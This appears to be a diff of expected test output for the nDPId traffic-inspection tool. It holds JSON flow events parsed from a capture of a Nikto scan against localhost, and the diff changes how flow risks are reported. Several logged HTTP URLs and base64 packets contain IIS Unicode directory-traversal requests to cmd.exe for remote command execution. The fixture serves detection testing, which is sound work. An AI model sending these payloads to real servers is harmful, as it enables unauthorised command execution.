-00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}}
+01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":728,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277867,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/certsrv\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003190)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_packet_id":1,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":254,"pkt_l4_len":220,"ts_msec":1576420277870,"pkt":"AAAAAAAAAAAAAAAACABFAADwKqRAAEAGEWJ\/AAABfwAAAcdMH5CrChOaUJIGgIAYAED+5AAAAQEICp1m\/5adZv+WR0VUIC9jZ2ktYmluLy4uJWMwJWFmLi4vLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}}
+01104{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":729,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7440000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"ts_msec":1576420277870,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003191)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_packet_id":1,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"ts_msec":1576420277871,"pkt":"AAAAAAAAAAAAAAAACABFAADnEqJAAEAGKW1\/AAABfwAAAcdOH5CE7yudGG3JzIAYAED+2wAAAQEICp1m\/5edZv+XR0VUIC9paXNhZG1wd2QvLi4lYzAlYWYuLi93aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMTkyKQ0KDQo="}
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}}
+01094{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"ts_msec":1576420277871,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/iisadmpwd\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003192)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_packet_id":1,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"ts_msec":1576420277873,"pkt":"AAAAAAAAAAAAAAAACABFAADuNNpAAEAGBy5\/AAABfwAAAcdQH5AuMg3l88MKY4AYAED+4gAAAQEICp1m\/5mdZv+ZR0VUIC9tc2FkYy8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzE5MykNCg0K"}
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}}
+01102{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7440000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"ts_msec":1576420277873,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003193)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00723{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_packet_id":1,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"ts_msec":1576420277874,"pkt":"AAAAAAAAAAAAAAAACABFAADxWrBAAEAG4VR\/AAABfwAAAcdSH5DZZWOTGgkmxYAYAED+5QAAAQEICp1m\/5qdZv+aR0VUIC9wYnNlcnZlci8uLiVjMCVhZi4uLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00916{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}}
+01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7440000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"ts_msec":1576420277874,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pbserver\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003194)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00720{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_packet_id":1,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"ts_msec":1576420277875,"pkt":"AAAAAAAAAAAAAAAACABFAADs1jZAAEAGZdN\/AAABfwAAAcdUH5CUA+8Kq3ejjIAYAED+4AAAAQEICp1m\/5udZv+bR0VUIC9ycGMvLi4lYzAlYWYuLi8uLiVjMCVhZi4uL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}}
+01100{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"ts_msec":1576420277875,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/rpc\/..%c0%af..\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003195)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_packet_id":1,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1576420277877,"pkt":"AAAAAAAAAAAAAAAACABFAADl6fRAAEAGUhx\/AAABfwAAAcdWH5B7VdDQBDmQE4AYAED+2QAAAQEICp1m\/52dZv+dR0VUIC9zY3JpcHRzLy4uJWMwJWFmLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTYpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}}
+01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277877,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003196)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_packet_id":1,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"ts_msec":1576420277878,"pkt":"AAAAAAAAAAAAAAAACABFAADltn1AAEAGhZN\/AAABfwAAAcdYH5Dqro9H\/GjzZIAYAED+2QAAAQEICp1m\/56dZv+eR0VUIC9zY3JpcHRzLy4uJWMxJTFjLi4vd2lubnQvc3lzdGVtMzIvY21kLmV4ZT8vYytkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMxOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}}
+01092{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":735,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1576420277878,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003197)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7440000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"ts_msec":1576420277880,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
